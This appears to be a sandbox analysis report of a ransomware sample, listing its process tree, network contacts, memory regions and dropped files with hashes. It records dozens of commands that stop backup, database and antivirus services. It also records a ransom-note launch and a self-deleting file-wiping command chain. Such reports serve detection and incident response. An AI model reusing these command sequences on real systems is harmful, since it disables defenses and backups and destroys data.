C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.poweradmin.com | udp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 8.8.8.8:53 | live.sysinternals.com | udp |
| GB | 20.49.223.105:80 | live.sysinternals.com | tcp |
| N/A | 10.10.0.255:3 | udp | |
| N/A | 10.10.0.255:3 | udp | |
| N/A | 10.10.0.255:3 | udp | |
| NL | 154.61.71.255:3 | udp | |
| N/A | 224.0.0.255:3 | udp | |
| N/A | 224.0.0.255:3 | udp | |
| N/A | 239.255.255.255:3 | udp | |
| N/A | 255.255.255.255:3 | udp | |
| N/A | 239.255.255.250:3702 | udp | |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.22.18.188:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | prometheusstat.in | udp |
| US | 8.8.8.8:53 | info.prometheusgroup.com | udp |
| US | 8.8.8.8:53 | www.imgurupload.com | udp |
| US | 199.60.103.254:443 | info.prometheusgroup.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| N/A | 239.255.255.250:3702 | udp |
Files
memory/744-114-0x0000000000530000-0x0000000000531000-memory.dmp
memory/744-116-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
memory/744-117-0x0000000004DB0000-0x0000000004DB1000-memory.dmp
memory/3776-118-0x0000000000000000-mapping.dmp
memory/960-120-0x0000000000000000-mapping.dmp
memory/2308-119-0x0000000000000000-mapping.dmp
memory/708-121-0x0000000000000000-mapping.dmp
memory/1368-122-0x0000000000000000-mapping.dmp
memory/2084-123-0x0000000000000000-mapping.dmp
memory/3044-125-0x0000000000000000-mapping.dmp
memory/3656-124-0x0000000000000000-mapping.dmp
memory/2504-126-0x0000000000000000-mapping.dmp
memory/2024-128-0x0000000000000000-mapping.dmp
memory/3796-127-0x0000000000000000-mapping.dmp
memory/1036-130-0x0000000000000000-mapping.dmp
memory/1296-131-0x0000000000000000-mapping.dmp
memory/2712-132-0x0000000000000000-mapping.dmp
memory/3064-133-0x0000000000000000-mapping.dmp
memory/4088-129-0x0000000000000000-mapping.dmp
memory/3920-134-0x0000000000000000-mapping.dmp
memory/3068-135-0x0000000000000000-mapping.dmp
memory/2220-136-0x0000000000000000-mapping.dmp
memory/2616-137-0x0000000000000000-mapping.dmp
memory/3868-140-0x0000000000000000-mapping.dmp
memory/3852-142-0x0000000000000000-mapping.dmp
memory/1204-144-0x0000000000000000-mapping.dmp
memory/4092-145-0x0000000000000000-mapping.dmp
memory/4140-148-0x0000000000000000-mapping.dmp
memory/4296-154-0x0000000000000000-mapping.dmp
memory/4268-153-0x0000000000000000-mapping.dmp
memory/4244-152-0x0000000000000000-mapping.dmp
memory/4224-151-0x0000000000000000-mapping.dmp
memory/4200-150-0x0000000000000000-mapping.dmp
memory/4400-157-0x0000000000000000-mapping.dmp
memory/4356-156-0x0000000000000000-mapping.dmp
memory/4344-155-0x0000000000000000-mapping.dmp
memory/4532-160-0x0000000000000000-mapping.dmp
memory/4548-161-0x0000000000000000-mapping.dmp
memory/4708-167-0x0000000000000000-mapping.dmp
memory/4796-170-0x0000000000000000-mapping.dmp
memory/4896-173-0x0000000000000000-mapping.dmp
memory/4848-172-0x0000000000000000-mapping.dmp
memory/5012-177-0x0000000000000000-mapping.dmp
memory/5076-178-0x0000000000000000-mapping.dmp
memory/10412-185-0x0000000004CB0000-0x0000000004CB1000-memory.dmp
memory/10412-188-0x00000000072C2000-0x00000000072C3000-memory.dmp
memory/10412-187-0x00000000072C0000-0x00000000072C1000-memory.dmp
memory/10412-186-0x0000000007900000-0x0000000007901000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
| MD5 | 3ba7dbb4ede0af8460784515c6eedf52 |
| SHA1 | b017e44311d752fd4ffe1642e44d3cc0a5f783a8 |
| SHA256 | 437e29d7e40ad47e3f3be67610005fc1cc9b515778ad2898b6143fa670fb57e4 |
| SHA512 | 33dcb55d05038f2d96e6820d736590453dca59c30449486510cb88f2393616fd8c58c6639fecbe0156aebb1a9d88bd699d1a679bcd84e00b3ea08970e11b0ae9 |
memory/15676-193-0x0000000004D60000-0x0000000004D61000-memory.dmp
memory/15676-194-0x0000000004D62000-0x0000000004D63000-memory.dmp
memory/15676-195-0x00000000076F0000-0x00000000076F1000-memory.dmp
memory/10412-197-0x0000000007780000-0x0000000007781000-memory.dmp
memory/10412-201-0x0000000008090000-0x0000000008091000-memory.dmp
memory/4156-181-0x0000000000000000-mapping.dmp
memory/5108-179-0x0000000000000000-mapping.dmp
memory/3984-180-0x0000000000000000-mapping.dmp
memory/4952-175-0x0000000000000000-mapping.dmp
memory/4980-176-0x0000000000000000-mapping.dmp
memory/4932-174-0x0000000000000000-mapping.dmp
memory/4836-171-0x0000000000000000-mapping.dmp
memory/4784-169-0x0000000000000000-mapping.dmp
memory/4748-168-0x0000000000000000-mapping.dmp
memory/4684-166-0x0000000000000000-mapping.dmp
memory/4648-165-0x0000000000000000-mapping.dmp
memory/4624-164-0x0000000000000000-mapping.dmp
memory/4592-163-0x0000000000000000-mapping.dmp
memory/4560-162-0x0000000000000000-mapping.dmp
memory/4488-159-0x0000000000000000-mapping.dmp
memory/4464-158-0x0000000000000000-mapping.dmp
memory/4160-149-0x0000000000000000-mapping.dmp
memory/4100-146-0x0000000000000000-mapping.dmp
memory/4124-147-0x0000000000000000-mapping.dmp
memory/2556-143-0x0000000000000000-mapping.dmp
memory/3860-141-0x0000000000000000-mapping.dmp
memory/3236-139-0x0000000000000000-mapping.dmp
memory/1184-138-0x0000000000000000-mapping.dmp
memory/15676-203-0x0000000008020000-0x0000000008021000-memory.dmp
memory/15676-205-0x00000000087F0000-0x00000000087F1000-memory.dmp
memory/15676-207-0x0000000008840000-0x0000000008841000-memory.dmp
memory/15676-226-0x0000000009560000-0x0000000009593000-memory.dmp
memory/15676-234-0x0000000009500000-0x0000000009501000-memory.dmp
memory/10412-236-0x00000000072C3000-0x00000000072C4000-memory.dmp
memory/15676-237-0x000000007E470000-0x000000007E471000-memory.dmp
memory/15676-241-0x0000000009690000-0x0000000009691000-memory.dmp
memory/15676-250-0x0000000004D63000-0x0000000004D64000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4bee6764158395ff4b8338d85a791fec |
| SHA1 | 95a27d8fb90f9a6f1a0249024031bbd12f70a6cc |
| SHA256 | 597d2a3c92b0baadaeb50d970bef99507134d632a1926a6ac708b55c0f7af91d |
| SHA512 | ab08040bef2fc96bd9a9c4f5f471259033641114d80bbb9f439fc9fe6b3f37ba6cb65d1a9f216739b9f0906d1bf9ee615221b058f5e04666767aa4ebf15e9927 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 0f5cbdca905beb13bebdcf43fb0716bd |
| SHA1 | 9e136131389fde83297267faf6c651d420671b3f |
| SHA256 | a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060 |
| SHA512 | a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0 |
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
| MD5 | 5b5092d4170180c338caaabcaff6ba72 |
| SHA1 | 7c93ef3b4195d1cf0cfb69c66b3f91587ad6e58d |
| SHA256 | 6b9a63a13de9fe2046759a2c7ab6c3ddb42fcea9f78de029b0cd1bc9756d130e |
| SHA512 | f9a3926344ed6292be1c53c1d3fa0669b0de4af2228b1f0910e510bb2cc3f3557ea8f7a0a84160770660278996bc18a7b19a3e451de3ba92a6e03bc02f39b0bf |